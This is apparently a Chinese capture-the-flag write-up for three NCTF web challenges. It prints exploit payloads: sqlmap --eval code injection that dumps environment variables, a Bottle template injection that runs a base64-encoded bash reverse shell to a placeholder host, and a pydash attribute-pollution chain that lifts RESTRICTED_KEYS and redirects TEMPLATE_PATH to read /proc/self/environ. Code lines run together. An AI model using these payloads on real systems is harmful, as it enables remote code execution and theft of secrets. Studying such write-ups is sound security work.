2025NCTF--Web

Web

sqlmap-master

源码

from fastapi import FastAPI, Request
from fastapi.responses import FileResponse, StreamingResponse
import subprocessapp = FastAPI()@app.get("/")
async def index():return FileResponse("index.html")@app.post("/run")
async def run(request: Request):data = await request.json()url = data.get("url")if not url:return {"error": "URL is required"}command = f'sqlmap -u {url} --batch --flush-session'def generate():process = subprocess.Popen(command.split(),stdout=subprocess.PIPE,stderr=subprocess.STDOUT,shell=False)while True:output = process.stdout.readline()if output == '' and process.poll() is not None:breakif output:yield outputreturn StreamingResponse(generate(), media_type="text/plain")

sqlmap存在一个eval的参数, 可以在每个请求期间运行自定义的 Python 代码

但是因为代码中会以空格分割, 所以 "import os;os.system('env')" 这种无法使用, 使用__import__动态导入执行

http://127.0.0.1 --eval __import__('os').system('env')

ez_dash

给了源码

'''
Hints: Flag在环境变量中
'''from typing import Optionalimport pydash
import bottle__forbidden_path__=['__annotations__', '__call__', '__class__', '__closure__','__code__', '__defaults__', '__delattr__', '__dict__','__dir__', '__doc__', '__eq__', '__format__','__ge__', '__get__', '__getattribute__','__gt__', '__hash__', '__init__', '__init_subclass__','__kwdefaults__', '__le__', '__lt__', '__module__','__name__', '__ne__', '__new__', '__qualname__','__reduce__', '__reduce_ex__', '__repr__', '__setattr__','__sizeof__', '__str__', '__subclasshook__', '__wrapped__',"Optional","func","render",]
__forbidden_name__=["bottle"
]
__forbidden_name__.extend(dir(globals()["__builtins__"]))def setval(name:str, path:str, value:str)-> Optional[bool]:if name.find("__")>=0: return Falsefor word in __forbidden_name__:if name==word:return Falsefor word in __forbidden_path__:if path.find(word)>=0: return Falseobj=globals()[name]try:pydash.set_(obj,path,value)except:return Falsereturn True@bottle.post('/setValue')
def set_value():name = bottle.request.query.get('name')path=bottle.request.json.get('path')if not isinstance(path,str):return "no"if len(name)>6 or len(path)>32:return "no"value=bottle.request.json.get('value')return "yes" if setval(name, path, value) else "no"@bottle.get('/render')
def render_template():path=bottle.request.query.get('path')if path.find("{")>=0 or path.find("}")>=0 or path.find(".")>=0:return "Hacker"return bottle.template(path)
bottle.run(host='0.0.0.0', port=8000)

直接看/render路由, 过滤了 { } ., 但是bottle渲染模板时不仅仅可以使用{{}}执行代码, 还可以使用 <% 进行执行代码

因为题目没有回显, 所以直接反弹shell就行

<% from os import systemfrom base64 import b64decodesystem(b64decode('YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC9pcC82NjY2IDA+JjEi'))

ez_dash_revenge

因为前一道题的非预期, 这道题把 <%的做法给禁了

'''
Hints: Flag在环境变量中
'''
from typing import Optionalimport pydash
import bottle__forbidden_path__=['__annotations__', '__call__', '__class__', '__closure__','__code__', '__defaults__', '__delattr__', '__dict__','__dir__', '__doc__', '__eq__', '__format__','__ge__', '__get__', '__getattribute__','__gt__', '__hash__', '__init__', '__init_subclass__','__kwdefaults__', '__le__', '__lt__', '__module__','__name__', '__ne__', '__new__', '__qualname__','__reduce__', '__reduce_ex__', '__repr__', '__setattr__','__sizeof__', '__str__', '__subclasshook__', '__wrapped__',"Optional","render"]
__forbidden_name__=["bottle"
]
__forbidden_name__.extend(dir(globals()["__builtins__"])) #所有的内置函数以及bottledef setval(name:str, path:str, value:str)-> Optional[bool]:if name.find("__")>=0: return Falsefor word in __forbidden_name__:if name==word:return Falsefor word in __forbidden_path__:if path.find(word)>=0: return Falseobj=globals()[name]try:pydash.set_(obj,path,value)except:return Falsereturn True@bottle.post('/setValue')
def set_value():name = bottle.request.query.get('name')path=bottle.request.json.get('path')if not isinstance(path,str):return "no"if len(name)>6 or len(path)>32:return "no"value=bottle.request.json.get('value')return "yes" if setval(name, path, value) else "no"@bottle.get('/render')
def render_template():path=bottle.request.query.get('path')if len(path)>10:return "hacker"blacklist=["{","}",".","%","<",">","_"] for c in path:if c in blacklist:return "hacker"return bottle.template(path)
bottle.run(host='0.0.0.0', port=8000)

先本地搭建调试一下

/render路由给path参数随便传入一个值, 一开始进入到这个函数

template

def template(*args, **kwargs):"""Get a rendered template as a string iterator.You can use a name, a filename or a template string as first parameter.Template rendering arguments can be passed as dictionariesor directly (as keyword arguments)."""tpl = args[0] if args else Nonefor dictarg in args[1:]:kwargs.update(dictarg)adapter = kwargs.pop('template_adapter', SimpleTemplate)lookup = kwargs.pop('template_lookup', TEMPLATE_PATH)tplid = (id(lookup), tpl)if tplid not in TEMPLATES or DEBUG:settings = kwargs.pop('template_settings', {})if isinstance(tpl, adapter):TEMPLATES[tplid] = tplif settings: TEMPLATES[tplid].prepare(**settings)elif "\n" in tpl or "{" in tpl or "%" in tpl or '$' in tpl:TEMPLATES[tplid] = adapter(source=tpl, lookup=lookup, **settings)else:TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings)if not TEMPLATES[tplid]:abort(500, 'Template (%s) not found' % tpl)return TEMPLATES[tplid].render(kwargs)

这个函数用于获取一个渲染后的模板, 并返回一个字符串迭代器

有三种方法获得模板

1. 模板对象, SimpleTemplate的实例
2. 模板字符串: \n, { , %, $
3. 模板文件名

这里能用的就是第三种, 传入一个 模板文件名 ,

lookup = kwargs.pop('template_lookup', TEMPLATE_PATH)
TEMPLATE_PATH = ['./', './views/']

传入的模板文件名是在lookup 目录中查找文件并加载, 而lookup默认是在当前目录或子目录views下

如果可以控制TEMPLATE_PATH为 /proc/self目录, 那么就可以读取environ环境变量文件了

接着进入到BaseTemplate

class BaseTemplate(object):""" Base class and minimal API for template adapters """extensions = ['tpl', 'html', 'thtml', 'stpl']settings = {}  #used in prepare()defaults = {}  #used in render()def __init__(self,source=None,name=None,lookup=None,encoding='utf8', **settings):""" Create a new template.If the source parameter (str or buffer) is missing, the name argumentis used to guess a template filename. Subclasses can assume thatself.source and/or self.filename are set. Both are strings.The lookup, encoding and settings parameters are stored as instancevariables.The lookup parameter stores a list containing directory paths.The encoding parameter should be used to decode byte strings or files.The settings parameter contains a dict for engine-specific settings."""self.name = nameself.source = source.read() if hasattr(source, 'read') else sourceself.filename = source.filename if hasattr(source, 'filename') else Noneself.lookup = [os.path.abspath(x) for x in lookup] if lookup else []self.encoding = encodingself.settings = self.settings.copy()  # Copy from class variableself.settings.update(settings)  # Applyif not self.source and self.name:self.filename = self.search(self.name, self.lookup)if not self.filename:raise TemplateError('Template %s not found.' % repr(name))if not self.source and not self.filename:raise TemplateError('No template specified.')self.prepare(**self.settings)@classmethoddef search(cls, name, lookup=None):""" Search name in all directories specified in lookup.First without, then with common extensions. Return first hit. """if not lookup:raise depr(0, 12, "Empty template lookup path.", "Configure a template lookup path.")if os.path.isabs(name):raise depr(0, 12, "Use of absolute path for template name.","Refer to templates with names or paths relative to the lookup path.")for spath in lookup:spath = os.path.abspath(spath) + os.sepfname = os.path.abspath(os.path.join(spath, name))if not fname.startswith(spath): continueif os.path.isfile(fname): return fnamefor ext in cls.extensions:if os.path.isfile('%s.%s' % (fname, ext)):return '%s.%s' % (fname, ext)

看到search函数里面

fname = os.path.abspath(os.path.join(spath, name)) #转化为绝对路径
if not fname.startswith(spath): continue

阻止了通过 ../../来绕过lookup目录的可能性

所以需要想办法去修改TEMPLATE_PATH的值, 从而实现任意文件读取

看到setval函数: 可以动态修改全局变量中的对象属性

def setval(name:str, path:str, value:str)-> Optional[bool]:if name.find("__")>=0: return False #拦截双下滑线__, python的魔法变量for word in __forbidden_name__:if name==word:return Falsefor word in __forbidden_path__:if path.find(word)>=0: return Falseobj=globals()[name]try:pydash.set_(obj,path,value)except:return Falsereturn True

尝试进行传参修改bottle.TEMPLATE_PATH的属性值, 会发现直接返回了no, 无法成功的污染

/setValue?name=setval{"path":"__globals__.bottle.TEMPLATE_PATH","value":["../../../../proc/self"]}

调试一下会发现走到这一步, 存在这样的代码 , 不允许key里面存在__globals__,代码不允许修改__globals__属性

def base_set(obj, key, value, allow_override=True):"""Set an object's `key` to `value`. If `obj` is a ``list`` and the `key` is the next availableindex position, append to list; otherwise, pad the list of ``None`` and then append to the list.Args:obj: Object to assign value to.key: Key or index to assign to.value: Value to assign.allow_override: Whether to allow overriding a previously set key."""if isinstance(obj, dict):if allow_override or key not in obj:obj[key] = valueelif isinstance(obj, list):key = int(key)if key < len(obj):if allow_override:obj[key] = valueelse:if key > len(obj):# Pad list object with None values up to the index key, so we can append the value# into the key index.obj[:] = (obj + [None] * key)[:key]obj.append(value)elif (allow_override or not hasattr(obj, key)) and obj is not None:_raise_if_restricted_key(key)setattr(obj, key, value)return obj

def _raise_if_restricted_key(key):# Prevent access to restricted keys for security reasons.if key in RESTRICTED_KEYS:raise KeyError(f"access to restricted key {key!r} is not allowed")

#: Object keys that are restricted from access via path access.
RESTRICTED_KEYS = ("__globals__", "__builtins__")

所以还需要污染RESTRICTED_KEYS的值

/setValue?name=pydash{"path":"helpers.RESTRICTED_KEYS","value":[]}

为什么要写成helpers.RESTRICTED_KEYS这样的形式, 可以打印一下

RESTRICTED_KEYS 位于helpers.py文件中

然后再污染TEMPLATE_PATH的值

?name=setval {"path":"__globals__.bottle.TEMPLATE_PATH","value":["../../../../proc/self"]}

直接访问?path=environ就可以看到文件内容了, 本地执行成功

按照上面的步骤在靶场环境打一遍就可以拿到flag了